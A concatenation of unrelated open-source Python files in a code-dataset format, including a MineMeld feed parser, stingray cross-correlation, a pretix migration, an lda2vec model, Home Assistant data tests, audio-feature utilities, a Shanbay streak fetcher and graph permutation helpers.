indicator = line.split()[0]
else:
indicator = self.indicator['regex'].search(line)
if indicator is None:
return [[None, None]]
indicator = indicator.expand(self.indicator['transform'])
attributes = {}
for f, fattrs in self.fields.iteritems():
m = fattrs['regex'].search(line)
if m is None:
continue
attributes[f] = m.expand(fattrs['transform'])
try:
i = int(attributes[f])
except:
pass
else:
attributes[f] = i
return [[indicator, attributes]]
def _build_iterator(self, now):
rkwargs = dict(
stream=True,
verify=self.verify_cert,
timeout=self.polling_timeout
)
if self.user_agent is not None:
if self.user_agent == 'MineMeld':
rkwargs['headers'] = {
'User-Agent': 'MineMeld/%s' % MM_VERSION
}
else:
rkwargs['headers'] = {
'User-Agent': self.user_agent
}
if self.username is not None and self.password is not None:
rkwargs['auth'] = (self.username, self.password)
r = requests.get(
self.url,
**rkwargs
)
try:
r.raise_for_status()
except:
LOG.debug('%s - exception in request: %s %s',
self.name, r.status_code, r.content)
raise
result = r.iter_lines()
if self.ignore_regex is not None:
result = itertools.ifilter(
lambda x: self.ignore_regex.match(x) is None,
result
)
if self.encoding is not None:
result = itertools.imap(
lambda x: x.decode(self.encoding).encode('utf_8'),
result
)
return result
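# Hypothetical illustration (not part of the original module): how an *extraction dictionary*
# like the dshield example in the docstring behaves on a single feed line, using the
# already-imported `re` module directly. The sample line is made up for illustration.
if __name__ == '__main__':
    sample_line = '192.0.2.0\t192.0.2.255\t24\t5100\texample-net\tUS\tabuse@example.com'
    indicator_cfg = {
        'regex': re.compile('^([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\t'
                            '([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})'),
        'transform': '\\1-\\2',
    }
    match = indicator_cfg['regex'].search(sample_line)
    print(match.expand(indicator_cfg['transform']))  # -> 192.0.2.0-192.0.2.255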
|
stingray/crosscorrelation.py | pierfra-ro/stingray | 133 | 12687343 | import warnings
import numpy as np
from scipy import signal
try:
from pyfftw.interfaces.scipy_fft import ifft, fftfreq
except ImportError:
warnings.warn("pyfftw not installed. Using standard scipy fft")
from scipy.fft import ifft, fftfreq
from stingray.lightcurve import Lightcurve
from stingray.crossspectrum import Crossspectrum, AveragedCrossspectrum
from stingray.exceptions import StingrayError
import stingray.utils as utils
__all__ = ['CrossCorrelation', 'AutoCorrelation']
class CrossCorrelation(object):
"""Make a cross-correlation from light curves or a cross spectrum.
You can also make an empty :class:`Crosscorrelation` object to populate
with your own cross-correlation data.
Parameters
----------
lc1: :class:`stingray.Lightcurve` object, optional, default ``None``
The first light curve data for correlation calculations.
lc2: :class:`stingray.Lightcurve` object, optional, default ``None``
The light curve data for the correlation calculations.
cross: :class: `stingray.Crossspectrum` object, default ``None``
The cross spectrum data for the correlation calculations.
mode: {``full``, ``valid``, ``same``}, optional, default ``same``
A string indicating the size of the correlation output.
See the relevant ``scipy`` documentation [scipy-docs]_
for more details.
Attributes
----------
lc1: :class:`stingray.Lightcurve`
The first light curve data for correlation calculations.
lc2: :class:`stingray.Lightcurve`
The light curve data for the correlation calculations.
cross: :class: `stingray.Crossspectrum`
The cross spectrum data for the correlation calculations.
corr: numpy.ndarray
An array of correlation data calculated from two light curves
time_lags: numpy.ndarray
An array of all possible time lags against which each point in corr is calculated
dt: float
The time resolution of each light curve (used in ``time_lag`` calculations)
time_shift: float
Time lag that gives maximum value of correlation between two light curves.
There will be maximum correlation between light curves if one of the light curve
is shifted by ``time_shift``.
n: int
Number of points in ``self.corr`` (length of cross-correlation data)
auto: bool
An internal flag to indicate whether this is a cross-correlation or an auto-correlation.
References
----------
.. [scipy-docs] https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.correlate.html
"""
def __init__(self, lc1=None, lc2=None, cross=None, mode='same'):
self.auto = False
if isinstance(mode, str) is False:
raise TypeError("mode must be a string")
if mode.lower() not in ["full", "valid", "same"]:
raise ValueError("mode must be 'full', 'valid' or 'same'!")
self.mode = mode.lower()
self.lc1 = None
self.lc2 = None
self.cross = None
# Populate all attributes with ``None`` if the user passes no light curve data
if lc1 is None or lc2 is None:
if lc1 is not None or lc2 is not None:
raise TypeError("You can't do a cross correlation with just one "
"light curve!")
else:
if cross is None:
# all object input params are ``None``
self.corr = None
self.time_shift = None
self.time_lags = None
self.dt = None
self.n = None
else:
self._make_cross_corr(cross)
return
else:
self._make_corr(lc1, lc2)
def _make_cross_corr(self, cross):
"""
Do some checks on the cross spectrum supplied to the method,
and then calculate the time shifts, time lags and cross correlation.
Parameters
----------
cross: :class:`stingray.Crossspectrum` object
The crossspectrum, averaged or not.
"""
if not isinstance(cross, Crossspectrum):
if not isinstance(cross, AveragedCrossspectrum):
raise TypeError("cross must be a crossspectrum.Crossspectrum \
or crossspectrum.AveragedCrossspectrum object")
if self.cross is None:
self.cross = cross
self.dt = 1/(cross.df * cross.n)
if self.dt is None:
self.dt = 1/(cross.df * cross.n)
prelim_corr = abs(ifft(cross.power).real) # keep only the real
self.n = len(prelim_corr)
# ifft spits out an array that looks like [0,1,...n,-n,...-1]
# where n is the last positive frequency
# correcting for this by putting them in order
times = fftfreq(self.n, cross.df)
time, corr = np.array(sorted(zip(times, prelim_corr))).T
self.corr = corr
self.time_shift, self.time_lags, self.n = self.cal_timeshift(dt=self.dt)
def _make_corr(self, lc1, lc2):
"""
Do some checks on the light curves supplied to the method, and then calculate the time
shifts, time lags and cross correlation.
Parameters
----------
lc1::class:`stingray.Lightcurve` object
The first light curve data.
lc2::class:`stingray.Lightcurve` object
The second light curve data.
"""
if not isinstance(lc1, Lightcurve):
raise TypeError("lc1 must be a lightcurve.Lightcurve object")
if not isinstance(lc2, Lightcurve):
raise TypeError("lc2 must be a lightcurve.Lightcurve object")
if not np.isclose(lc1.dt, lc2.dt):
raise StingrayError("Light curves do not have "
"same time binning dt.")
else:
# ignore very small differences in dt neglected by np.isclose()
lc1.dt = lc2.dt
self.dt = lc1.dt
# self.lc1 and self.lc2 may get assigned values explicitly in which case there is no need to copy data
if self.lc1 is None:
self.lc1 = lc1
if self.lc2 is None:
self.lc2 = lc2
# Subtract means before passing scipy.signal.correlate into correlation
lc1_counts = self.lc1.counts - np.mean(self.lc1.counts)
lc2_counts = self.lc2.counts - np.mean(self.lc2.counts)
# Calculates cross-correlation of two lightcurves
self.corr = signal.correlate(lc1_counts, lc2_counts, self.mode)
self.n = len(self.corr)
self.time_shift, self.time_lags, self.n = self.cal_timeshift(dt=self.dt)
def cal_timeshift(self, dt=1.0):
"""
Calculate the cross correlation against all possible time lags, both positive and negative.
Parameters
----------
dt: float, optional, default ``1.0``
Time resolution of the light curve, should be passed when object is populated with
correlation data and no information about light curve can be extracted. Used to
calculate ``time_lags``.
Returns
-------
self.time_shift: float
Value of the time lag that gives maximum value of correlation between two light curves.
self.time_lags: numpy.ndarray
An array of ``time_lags`` calculated from correlation data
"""
if self.dt is None:
self.dt = dt
if self.corr is None:
if (self.lc1 is None or self.lc2 is None) and (self.cross is None):
raise StingrayError('Please provide either two lightcurve objects or \
a [average]crossspectrum object to calculate correlation and time_shift')
else:
# This will cover very rare case of assigning self.lc1 and lc2
# or self.cross and also self.corr = ``None``.
# In this case, correlation is calculated using self.lc1
# and self.lc2 and using that correlation data,
# time_shift is calculated.
if self.cross is not None:
self._make_cross_corr(self.cross)
else:
self._make_corr(self.lc1, self.lc2)
self.n = len(self.corr)
dur = int(self.n / 2)
# Correlation against all possible lags, positive as well as negative lags are stored
x_lags = np.linspace(-dur, dur, self.n)
self.time_lags = x_lags * self.dt
# time_shift is the time lag for max. correlation
self.time_shift = self.time_lags[np.argmax(self.corr)]
return self.time_shift, self.time_lags, self.n
def plot(self, labels=None, axis=None, title=None, marker='-', save=False, filename=None, ax=None):
"""
Plot the :class:`Crosscorrelation` as function using Matplotlib.
Plot the Crosscorrelation object on a graph ``self.time_lags`` on x-axis and
``self.corr`` on y-axis
Parameters
----------
labels : iterable, default ``None``
A list of tuple with ``xlabel`` and ``ylabel`` as strings.
axis : list, tuple, string, default ``None``
Parameter to set axis properties of ``matplotlib`` figure. For example
it can be a list like ``[xmin, xmax, ymin, ymax]`` or any other
acceptable argument for ``matplotlib.pyplot.axis()`` function.
title : str, default ``None``
The title of the plot.
marker : str, default ``-``
Line style and color of the plot. Line styles and colors are
combined in a single format string, as in ``'bo'`` for blue
circles. See ``matplotlib.pyplot.plot`` for more options.
save : boolean, optional (default=False)
If True, save the figure with specified filename.
filename : str
File name of the image to save. Depends on the boolean ``save``.
ax : ``matplotlib.Axes`` object
An axes object to fill with the cross correlation plot.
"""
try:
import matplotlib.pyplot as plt
except ImportError:
raise ImportError("Matplotlib required for plot()")
if ax is None:
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
ax.plot(self.time_lags, self.corr, marker)
if labels is not None:
try:
ax.set_xlabel(labels[0])
ax.set_ylabel(labels[1])
except TypeError:
utils.simon("``labels`` must be either a list or tuple with "
"x and y labels.")
raise
except IndexError:
utils.simon("``labels`` must have two labels for x and y "
"axes.")
# Not raising here because in case of len(labels)==1, only
# x-axis will be labelled.
# axis is a tuple containing formatting information
if axis is not None:
ax.axis(axis)
if title is not None:
ax.set_title(title)
if save:
if filename is None:
plt.savefig('corr.pdf', format="pdf")
else:
plt.savefig(filename)
else:
plt.show(block=False)
return ax
class AutoCorrelation(CrossCorrelation):
"""
Make an auto-correlation from a light curve.
You can also make an empty Autocorrelation object to populate with your
own auto-correlation data.
Parameters
----------
lc: :class:`stingray.Lightcurve` object, optional, default ``None``
The light curve data for correlation calculations.
mode: {``full``, ``valid``, ``same``}, optional, default ``same``
A string indicating the size of the correlation output.
See the relevant ``scipy`` documentation [scipy-docs]_
for more details.
Attributes
----------
lc1, lc2::class:`stingray.Lightcurve`
The light curve data for correlation calculations.
corr: numpy.ndarray
An array of correlation data calculated from lightcurve data
time_lags: numpy.ndarray
An array of all possible time lags against which each point in corr is calculated
dt: float
The time resolution of each lightcurve (used in time_lag calculations)
time_shift: float, zero
Max. Value of AutoCorrelation is always at zero lag.
n: int
Number of points in ``self.corr`` (length of auto-correlation data)
"""
def __init__(self, lc=None, mode='same'):
CrossCorrelation.__init__(self, lc1=lc, lc2=lc, mode=mode)
self.auto = True
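# Hypothetical usage sketch (not part of the original module): correlate two short synthetic
# light curves, one a shifted copy of the other. The sinusoidal counts are made up for
# illustration; the variable is named `sig` to avoid shadowing scipy's `signal` import above.
if __name__ == '__main__':
    dt = 1.0
    times = np.arange(0.0, 100.0, dt)
    sig = np.sin(2 * np.pi * times / 20.0)
    lc_a = Lightcurve(times, 100 + 10 * sig)
    lc_b = Lightcurve(times, 100 + 10 * np.roll(sig, 5))  # delayed copy of lc_a
    cc = CrossCorrelation(lc_a, lc_b)
    print(cc.time_shift)   # lag (in seconds) at which the correlation peaks
    ac = AutoCorrelation(lc_a)
    print(ac.time_shift)   # ~0 for an autocorrelation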
|
src/pretix/base/migrations/0084_questionoption_position.py | pajowu/pretix | 1,248 | 12687347 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-03-03 16:41
from __future__ import unicode_literals
from django.db import migrations, models
def set_position(apps, schema_editor):
Question = apps.get_model('pretixbase', 'Question')
for q in Question.objects.all():
for i, option in enumerate(q.options.all()):
option.position = i
option.save()
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0083_auto_20180228_2102'),
]
operations = [
migrations.AlterModelOptions(
name='questionoption',
options={'ordering': ('position', 'id'), 'verbose_name': 'Question option', 'verbose_name_plural': 'Question options'},
),
migrations.AddField(
model_name='questionoption',
name='position',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='question',
name='position',
field=models.PositiveIntegerField(default=0, verbose_name='Position'),
),
migrations.RunPython(
set_position,
reverse_code=migrations.RunPython.noop,
),
]
|
lda2vec/Lda2vec.py | MatrixBlake/Lda2vec-Tensorflow | 119 | 12687354 | import tensorflow as tf
import numpy as np
import lda2vec.word_embedding as W
import lda2vec.embedding_mixture as M
import lda2vec.dirichlet_likelihood as DL
from lda2vec import utils
from datetime import datetime
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
class Lda2vec:
RESTORE_KEY = 'to_restore'
def __init__(self, num_unique_documents, vocab_size, num_topics, freqs=None,
save_graph_def=True, embedding_size=128, num_sampled=40,
learning_rate=0.001, lmbda=200.0, alpha=None, power=0.75, batch_size=500, logdir='logdir',
restore=False, fixed_words=False, factors_in=None, pretrained_embeddings=None):
"""Summary
Args:
num_unique_documents (int): Number of unique documents in your dataset
vocab_size (int): Number of unique words/tokens in your dataset
num_topics (int): The set number of topics to cluster your data into
freqs (list, optional): Python list of length vocab_size with frequencies of each token
save_graph_def (bool, optional): If true, we will save the graph to logdir
embedding_size (int, optional): Dimension of the embeddings. This will be shared between docs, words, and topics.
num_sampled (int, optional): Negative sampling number for NCE Loss.
learning_rate (float, optional): Learning rate for optimizer
lmbda (float, optional): Strength of dirichlet prior
alpha (None, optional): alpha of dirichlet process (defaults to 1/n_topics)
power (float, optional): unigram sampler distortion
batch_size (int, optional): Batch size coming into model
logdir (str, optional): Location for models to be saved - note, we will append on the datetime too on each run
restore (bool, optional): When True, we will restore the model from the logdir parameter's location
fixed_words (bool, optional): Description
factors_in (None, optional): Pretrained Topic Embedding (shape should be [num_topics, embedding_size])
pretrained_embeddings (None, optional): Description
"""
self.config = tf.ConfigProto()
self.config.gpu_options.allow_growth = True
self.sesh = tf.Session(config=self.config)
self.moving_avgs = tf.train.ExponentialMovingAverage(0.9)
self.num_unique_documents = num_unique_documents
self.vocab_size = vocab_size
self.num_topics = num_topics
self.freqs = freqs
self.save_graph_def = save_graph_def
self.logdir = logdir
self.embedding_size = embedding_size
self.num_sampled = num_sampled
self.learning_rate = learning_rate
self.lmbda = lmbda
self.alpha = alpha
self.power = power
self.batch_size = batch_size
self.pretrained_embeddings = pretrained_embeddings
self.factors_in = factors_in
self.compute_normed = False
self.fixed_words = fixed_words
if not restore:
self.date = datetime.now().strftime('%y%m%d_%H%M')
self.logdir = ('{}_{}').format(self.logdir, self.date)
# Load pretrained embeddings if provided.
if isinstance(pretrained_embeddings, np.ndarray):
W_in = tf.constant(pretrained_embeddings, name="word_embedding") if fixed_words else tf.get_variable("word_embedding", shape=[self.vocab_size,self.embedding_size], initializer=tf.constant_initializer(pretrained_embeddings))
else:
W_in = None
# Initialize the word embedding
self.w_embed = W.Word_Embedding(self.embedding_size, self.vocab_size, self.num_sampled,
W_in=W_in, freqs=self.freqs,
power=self.power)
# Initialize the Topic-Document Mixture
self.mixture = M.EmbedMixture(self.num_unique_documents, self.num_topics, self.embedding_size)
# Builds the graph and returns variables within it
handles = self._build_graph()
for handle in handles:
tf.add_to_collection(Lda2vec.RESTORE_KEY, handle)
# Add Word Embedding Variables to collection
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.w_embed.embedding)
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.w_embed.nce_weights)
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.w_embed.nce_biases)
# Add Doc Mixture Variables to collection
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.mixture.doc_embedding)
tf.add_to_collection(Lda2vec.RESTORE_KEY, self.mixture.topic_embedding)
(self.x, self.y, self.docs, self.step, self.switch_loss,
self.word_context, self.doc_context, self.loss_word2vec,
self.fraction, self.loss_lda, self.loss, self.loss_avgs_op,
self.optimizer, self.merged) = handles
else:
meta_graph = logdir + '/model.ckpt'
tf.train.import_meta_graph(meta_graph + '.meta').restore(self.sesh, meta_graph)
handles = self.sesh.graph.get_collection(Lda2vec.RESTORE_KEY)
(self.x, self.y, self.docs, self.step, self.switch_loss,
self.word_context, self.doc_context, self.loss_word2vec,
self.fraction, self.loss_lda, self.loss, self.loss_avgs_op,
self.optimizer, self.merged, embedding, nce_weights, nce_biases,
doc_embedding, topic_embedding) = handles
self.w_embed = W.Word_Embedding(self.embedding_size, self.vocab_size, self.num_sampled,
W_in=embedding, freqs=self.freqs,
power=self.power,
nce_w_in=nce_weights,
nce_b_in=nce_biases)
# Initialize the Topic-Document Mixture
self.mixture = M.EmbedMixture(self.num_unique_documents,
self.num_topics,
self.embedding_size,
W_in=doc_embedding,
factors_in=topic_embedding)
def prior(self):
"""Computes Dirichlet Prior.
Returns:
TYPE: Dirichlet Prior Value
"""
doc_prior = DL.dirichlet_likelihood(self.mixture.doc_embedding, alpha=self.alpha)
return doc_prior
def _build_graph(self):
"""Builds the Lda2vec model graph.
"""
# Model Inputs
# Pivot Words
x = tf.placeholder(tf.int32, shape=[None], name='x_pivot_idxs')
# Context/Target Words
y = tf.placeholder(tf.int64, shape=[None], name='y_target_idxs')
# Document ID
docs = tf.placeholder(tf.int32, shape=[None], name='doc_ids')
# Global Step
step = tf.Variable(0, trainable=False, name='global_step')
# What epoch should we switch on lda loss?
switch_loss = tf.Variable(0, trainable=False)
# Word embedding lookup
word_context = tf.nn.embedding_lookup(self.w_embed.embedding, x, name='word_embed_lookup')
# Document Context via document ID lookup
doc_context = self.mixture(doc_ids=docs)
# Compile word + doc context in list and add them together
contexts_to_add=[word_context, doc_context]
context = tf.add_n(contexts_to_add, name='context_vector')
# Compute Word2Vec Loss
with tf.name_scope('nce_loss'):
loss_word2vec = self.w_embed(context, y)
tf.summary.scalar('nce_loss', loss_word2vec)
# Compute LDA Loss
with tf.name_scope('lda_loss'):
fraction = tf.Variable(1, trainable=False, dtype=tf.float32, name='fraction')
loss_lda = self.lmbda * fraction * self.prior()
tf.summary.scalar('lda_loss', loss_lda)
# Determine if we should be using only word2vec loss or if we should add in LDA loss based on switch_loss Variable
loss = tf.cond(step < switch_loss, lambda: loss_word2vec, lambda: loss_word2vec + loss_lda)
# Add current loss to moving average of loss
loss_avgs_op = self.moving_avgs.apply([loss_lda, loss_word2vec, loss])
# Init the optimizer
with tf.control_dependencies([loss_avgs_op]):
optimizer = tf.contrib.layers.optimize_loss(loss,
tf.train.get_global_step(),
self.learning_rate,
'Adam',
name='Optimizer')
# Initialize all variables
self.sesh.run(tf.global_variables_initializer(), options=tf.RunOptions(report_tensor_allocations_upon_oom=True))
# Create a merged summary of variables
merged = tf.summary.merge_all()
to_return = [x, y, docs, step, switch_loss, word_context, doc_context,
loss_word2vec, fraction, loss_lda, loss, loss_avgs_op, optimizer, merged]
return to_return
def train(self, pivot_words, target_words, doc_ids, data_size, num_epochs, switch_loss_epoch=0,
save_every=1, report_every=1, print_topics_every=5, idx_to_word=None):
"""Train the Lda2vec Model. pivot_words, target_words, and doc_ids should be
the same size.
Args:
pivot_words (np.array): Array of word idxs corresponding to pivot words
target_words (np.array): Array of word idxs corresponding to target words
doc_ids (TYPE): Document IDs linking word idxs to their docs
data_size (TYPE): Length of pivot_words array
num_epochs (TYPE): Number of epochs to train model
switch_loss_epoch (int, optional): Epoch to switch on LDA loss. LDA loss not learned
until this epoch
save_every (int, optional): Save model every "save_every" epoch
report_every (int, optional): Report model metrics every "report_every" epoch.
print_topics_every (int, optional): Print top 10 words in each topic every "print_topics_every"
idx_to_word (None, optional): IDX to word mapping - Required if you want to see word-topic membership
"""
# Calculate fraction used in DL Loss calculation
temp_fraction = self.batch_size * 1.0 / data_size
# Assign the fraction placeholder variable with the value we calculated
self.sesh.run(tf.assign(self.fraction, temp_fraction))
# Calculate the number of iterations per epoch so we can figure out when to switch the loss
iters_per_epoch = int(data_size / self.batch_size) + np.ceil(data_size % self.batch_size)
# Calculate what step we would be on @ the switch loss epoch
switch_loss_step = iters_per_epoch * switch_loss_epoch
# Assign the switch loss variable with the step we just calculated
self.sesh.run(tf.assign(self.switch_loss, switch_loss_step))
if self.save_graph_def:
# Initialize a tensorflow Saver object
saver = tf.train.Saver()
# Initialize a tensorflow summary writer so we can save logs
writer = tf.summary.FileWriter(self.logdir + '/', graph=self.sesh.graph)
# Iterate over the number of epochs we want to train for
for e in range(num_epochs):
print('\nEPOCH:', e + 1)
# Get a batch worth of data
for p, t, d in utils.chunks(self.batch_size, pivot_words, target_words, doc_ids):
# Create the feed dict from the batched data
feed_dict = {self.x: p, self.y: t, self.docs: d}
# Values we want to fetch whenever we run the model
fetches = [self.merged, self.optimizer, self.loss,
self.loss_word2vec, self.loss_lda, self.step]
# Run a step of the model
summary, _, l, lw2v, llda, step = self.sesh.run(fetches, feed_dict=feed_dict)
# Prints log every "report_every" epoch
if (e+1) % report_every == 0:
print('LOSS', l, 'w2v', lw2v, 'lda', llda)
# Saves model every "save_every" epoch
if (e+1) % save_every == 0 and self.save_graph_def:
writer.add_summary(summary, step)
writer.flush()
writer.close()
save_path = saver.save(self.sesh, self.logdir + '/model.ckpt')
writer = tf.summary.FileWriter(self.logdir + '/', graph=self.sesh.graph)
# Prints out membership of words in each topic every "print_topics_every" epoch
if e>0 and (e+1)%print_topics_every==0:
idxs = np.arange(self.num_topics)
words, sims = self.get_k_closest(idxs, in_type='topic', idx_to_word=idx_to_word, k=10, verbose=True)
# Save after all epochs are finished, but only if we didn't just save
if self.save_graph_def and (e+1) % save_every != 0:
writer.add_summary(summary, step)
writer.flush()
writer.close()
save_path = saver.save(self.sesh, self.logdir + '/model.ckpt')
def compute_normed_embeds(self):
"""Normalizes embeddings so we can measure cosine similarity
between different embedding matrixes.
"""
self.normed_embed_dict = {}
norm = tf.sqrt(tf.reduce_sum(self.mixture.topic_embedding ** 2, 1, keep_dims=True))
self.normed_embed_dict['topic'] = self.mixture.topic_embedding / norm
norm = tf.sqrt(tf.reduce_sum(self.w_embed.embedding ** 2, 1, keep_dims=True))
self.normed_embed_dict['word'] = self.w_embed.embedding / norm
norm = tf.sqrt(tf.reduce_sum(self.mixture.doc_embedding ** 2, 1, keep_dims=True))
self.normed_embed_dict['doc'] = self.mixture.doc_embedding / norm
self.idxs_in = tf.placeholder(tf.int32, shape=[None], name='idxs')
self.compute_normed = True
def get_k_closest(self, idxs, in_type='word', vs_type='word', k=10, idx_to_word=None, verbose=False):
"""Gets k closest vs_type embeddings for every idx of in_type embedding given.
Options for the in_type and vs_type are ["word", "topic", "doc"].
Args:
idxs (np.array): Array of indexes you want to get similarities to
in_type (str, optional): idxs will query this embedding matrix
vs_type (str, optional): embeddings to compare to in_type embedding lookup
k (int, optional): Number of vs_type embeddings to return per idx
idx_to_word (dict, optional): IDX to word mapping
verbose (bool, optional): Should we print out the top k words per epoch? False by default.
Only prints if idx_to_word is passed too.
Returns:
sim: Actual embeddings that are similar to each idx. shape [idxs.shape[0], k, self.embed_size]
sim_idxs: Indexes of the sim embeddings. shape [idxs.shape[0], k]
NOTE: Acceptable pairs include:
word - word
word - topic
topic - word
doc - doc
"""
if self.compute_normed == False:
self.compute_normed_embeds()
self.batch_array = tf.nn.embedding_lookup(self.normed_embed_dict[in_type], self.idxs_in)
self.cosine_similarity = tf.matmul(self.batch_array, tf.transpose(self.normed_embed_dict[vs_type], [1, 0]))
feed_dict = {self.idxs_in: idxs}
sim, sim_idxs = self.sesh.run(tf.nn.top_k(self.cosine_similarity, k=k), feed_dict=feed_dict)
if idx_to_word:
if verbose and vs_type=="word":
print('---------Closest {} words to given indexes----------'.format(k))
for i, idx in enumerate(idxs):
if in_type == 'word':
in_word = idx_to_word[idx]
else:
in_word = 'Topic ' + str(idx)
vs_word_list = []
for vs_i in range(sim_idxs[i].shape[0]):
vs_idx = sim_idxs[i][vs_i]
vs_word = idx_to_word[vs_idx]
vs_word_list.append(vs_word)
if verbose and vs_type=="word":
print(in_word, ':', (', ').join(vs_word_list))
return (sim, sim_idxs)
def save_weights_to_file(self, word_embed_path='word_weights', doc_embed_path='doc_weights',
topic_embed_path='topic_weights'):
"""Saves embedding matrixes to file.
Args:
word_embed_path (str, optional): Path and name where you want to save word embeddings
doc_embed_path (str, optional): Path and name where you want to save doc embeddings
topic_embed_path (str, optional): Path and name where you want to save topic embeddings
"""
word_embeds = self.sesh.run(self.w_embed.embedding)
np.save(word_embed_path, word_embeds)
doc_embeds = self.sesh.run(self.mixture.doc_embedding)
np.save(doc_embed_path, doc_embeds)
topic_embeds = self.sesh.run(self.mixture.topic_embedding)
np.save(topic_embed_path, topic_embeds)
|
tests/test_core.py | basnijholt/HASS-data-detective | 128 | 12687446 | from unittest.mock import patch
from detective.core import get_db_type, stripped_db_url
def test_get_db_type():
assert get_db_type("mysql://localhost") == "mysql"
assert get_db_type("mysql+pymysql://localhost") == "mysql"
def test_stripped_db_url():
assert stripped_db_url("mysql://localhost") == "mysql://localhost"
assert stripped_db_url("mysql://paulus@localhost") == "mysql://paulus@localhost"
assert (
stripped_db_url("mysql://paulus:password@localhost")
== "mysql://paulus:***@localhost"
)
def test_fetch_entities(mock_db):
with patch.object(
mock_db,
"perform_query",
return_value=[["light.kitchen"], ["light.living_room"], ["switch.ac"],],
):
mock_db.fetch_entities()
assert mock_db.entities == ["light.kitchen", "light.living_room", "switch.ac"]
|
utils/utils.py | BaoLocPham/hum2song | 108 | 12687481 | import torch
import numpy as np
from torchvision import transforms as T
from sklearn.preprocessing import normalize
import os
def load_image(npy_path, input_shape=(630, 80)):
data = np.load(npy_path)
if data.shape[0] >= input_shape[0]:
result = data[:input_shape[0], :]
else:
result = np.zeros(input_shape)
result[:data.shape[0], :data.shape[1]] = data
image = torch.from_numpy(result).unsqueeze(0).unsqueeze(0)
return image.float()
def get_feature(model, image):
data = image.to(torch.device("cuda"))
with torch.no_grad():
output = model(data)
output = output.cpu().detach().numpy()
output = normalize(output).flatten()
return np.matrix(output)
def writeFile(fileName, content):
with open(fileName, 'a') as f1:
f1.write(content + os.linesep)
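# Hypothetical usage sketch (not part of the original file): pad/crop a dummy mel-spectrogram
# to the fixed (630, 80) input shape. The embedding call is left commented out because it
# assumes a CUDA model built elsewhere in the project.
if __name__ == '__main__':
    dummy = np.random.rand(500, 80).astype(np.float32)  # stand-in for a real hum spectrogram
    np.save('dummy_mel.npy', dummy)
    image = load_image('dummy_mel.npy')
    print(image.shape)  # torch.Size([1, 1, 630, 80])
    # feature = get_feature(model, image)   # `model` assumed: an embedding network on the GPU
    # writeFile('features.txt', str(feature.shape))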
|
daily/shanbay.py | androiddevnotesforks/2021 | 246 | 12687491 | import pendulum
import requests
from .config import MY_SHANBAY_USER_NAME, SHANBAY_CALENDAR_API
def _get_shanbay_streak(end_date=pendulum.now("Asia/Shanghai"), streak=0):
start_date = end_date.start_of("month")
r = requests.get(
SHANBAY_CALENDAR_API.format(
user_name=MY_SHANBAY_USER_NAME,
start_date=start_date.to_date_string(),
end_date=end_date.to_date_string(),
)
)
if not r.ok:
raise Exception("Can not get days from shanbay API")
data = r.json()
logs = data["logs"]
if not logs:
return streak
periods = list(pendulum.period(start_date, end_date.subtract(days=1)))
periods.sort(reverse=True)
log_dates = [i["date"] for i in logs]
# count today if the check-in is already done
if end_date.to_date_string() in log_dates:
streak += 1
# for/else: the else branch runs only if the loop never hit break
for p in periods:
if p.to_date_string() not in log_dates:
break
streak += 1
else:
streak = _get_shanbay_streak(
start_date.subtract(months=1).end_of("month"), streak=streak
)
return streak
def get_shanbay_daily(*args):
"""
first get today status
"""
end_date = pendulum.now("Asia/Shanghai")
start_date = end_date.start_of("month")
r = requests.get(
SHANBAY_CALENDAR_API.format(
user_name=MY_SHANBAY_USER_NAME,
start_date=start_date.to_date_string(),
end_date=end_date.to_date_string(),
)
)
if not r.ok:
raise Exception("Can not get days from shanbay API")
data = r.json()
is_today_check = False
total_days = data.get("checkin_days_num", 0)
log_dates = [i["date"] for i in data["logs"]]
if end_date.to_date_string() in log_dates:
is_today_check = True
streak = _get_shanbay_streak()
return total_days, streak, is_today_check
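# Example (illustrative): a daily job would typically just call the function
# above and report the result.
#
#   total_days, streak, is_today_check = get_shanbay_daily()
#   print("Shanbay: {} days total, {} day streak, checked in today: {}".format(
#       total_days, streak, is_today_check))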
|
chainer_chemistry/utils/permutation.py | pfnet/chainerchem | 184 | 12687501 | import numpy
def permute_node(node, permutation_index, axis=-1):
"""Permute index of `node` array
Args:
node (numpy.ndarray): the array whose `axis` to be permuted.
permutation_index (numpy.ndarray): 1d numpy array whose size should be
same as permutation axis of `node`.
axis (int): permutation axis.
    Returns (numpy.ndarray): permuted `node` array.
"""
if node.shape[axis] != len(permutation_index):
raise ValueError(
'node.shape[{}] = {} and len(permutation_index) = {} do not match!'
.format(axis, node.shape[axis], len(permutation_index)))
out_node = numpy.take(node, permutation_index, axis=axis).copy()
return out_node
def permute_adj(adj, permutation_index, axis=None):
"""Permute index of adjacency matrix array
Args:
adj (numpy.ndarray): the array whose `axis` to be permuted.
It is considered as adjacency matrix.
permutation_index (numpy.ndarray): 1d numpy array whose size should be
same as permutation axis of `node`.
        axis (list or tuple or None): two ints indicating the permutation
            axes. When None is passed (default), -1 and -2 are used, meaning
            that the last two axes are permuted.
    Returns (numpy.ndarray): permuted `adj` array.
"""
if axis is not None:
if not isinstance(axis, (list, tuple)):
raise TypeError('axis must be list or tuple, got {}'
.format(type(axis)))
if len(axis) != 2:
            raise ValueError('axis length must be 2, got {}'.format(len(axis)))
else:
axis = [-1, -2] # default value is to use last 2 axis
num_node = len(permutation_index)
for ax in axis:
if adj.shape[ax] != len(permutation_index):
raise ValueError(
'adj.shape[{}] = {} and len(permutation_index) = {} do not '
                'match!'.format(ax, adj.shape[ax], len(permutation_index)))
out_adj = numpy.zeros_like(adj)
ndim = adj.ndim
for i in range(num_node):
for j in range(num_node):
in_indices = [slice(None)] * ndim
out_indices = [slice(None)] * ndim
in_indices[axis[0]] = i
in_indices[axis[1]] = j
out_indices[axis[0]] = permutation_index[i]
out_indices[axis[1]] = permutation_index[j]
out_adj[tuple(in_indices)] = adj[tuple(out_indices)]
return out_adj
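# Example (illustrative): node features and the adjacency matrix of a small
# graph stay consistent when permuted with the same index array.
#
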